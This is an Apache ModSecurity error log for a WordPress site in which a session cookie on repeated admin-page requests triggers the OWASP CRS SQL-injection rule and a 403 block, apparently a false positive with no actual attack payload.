[Mon May 11 18:29:58.292847 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEBjJnyuKVXoStDhbhawAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:58.293131 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEBjJnyuKVXoStDhbhawAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:58.889622 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEBjJnyuKVXoStDhbhawAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:59.203326 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEBzJnyuKVXoStDhbhbQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:59.203641 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEBzJnyuKVXoStDhbhbQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:29:59.827221 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEBzJnyuKVXoStDhbhbQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:00.286092 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIECDJnyuKVXoStDhbhbwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:00.286412 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIECDJnyuKVXoStDhbhbwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:00.930884 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIECDJnyuKVXoStDhbhbwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:01.196660 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIECTJnyuKVXoStDhbhcAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:01.196947 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIECTJnyuKVXoStDhbhcAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:01.748060 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIECTJnyuKVXoStDhbhcAAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:01.897176 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIECTJnyuKVXoStDhbhcQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:01.897451 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIECTJnyuKVXoStDhbhcQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:02.494759 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIECTJnyuKVXoStDhbhcQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:02.697592 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIECjJnyuKVXoStDhbhdQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:02.697875 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIECjJnyuKVXoStDhbhdQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:03.085092 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIECjJnyuKVXoStDhbhdQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:03.307468 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIECzJnyuKVXoStDhbhdgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:03.307766 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIECzJnyuKVXoStDhbhdgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:03.907124 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIECzJnyuKVXoStDhbhdgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:04.180198 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEDDJnyuKVXoStDhbhdwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:04.180489 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEDDJnyuKVXoStDhbhdwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:04.839636 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEDDJnyuKVXoStDhbhdwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:05.013976 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEDTJnyuKVXoStDhbheQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:05.014310 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEDTJnyuKVXoStDhbheQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:05.623257 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEDTJnyuKVXoStDhbheQAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:05.907805 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEDTJnyuKVXoStDhbhewAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:05.908089 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEDTJnyuKVXoStDhbhewAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:06.492475 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEDTJnyuKVXoStDhbhewAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:06.661372 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEDjJnyuKVXoStDhbhfgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:06.661680 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEDjJnyuKVXoStDhbhfgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:07.235012 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEDjJnyuKVXoStDhbhfgAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:07.345644 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEDzJnyuKVXoStDhbhfwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:07.345964 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEDzJnyuKVXoStDhbhfwAAAEE"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:30:07.711270 2026] [security2:error] [pid 1412074:tid 1412077] [client 31.57.184.104:63751] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEDzJnyuKVXoStDhbhfwAAAEE"], referer: https://rentparadise.fr/wp-login.php
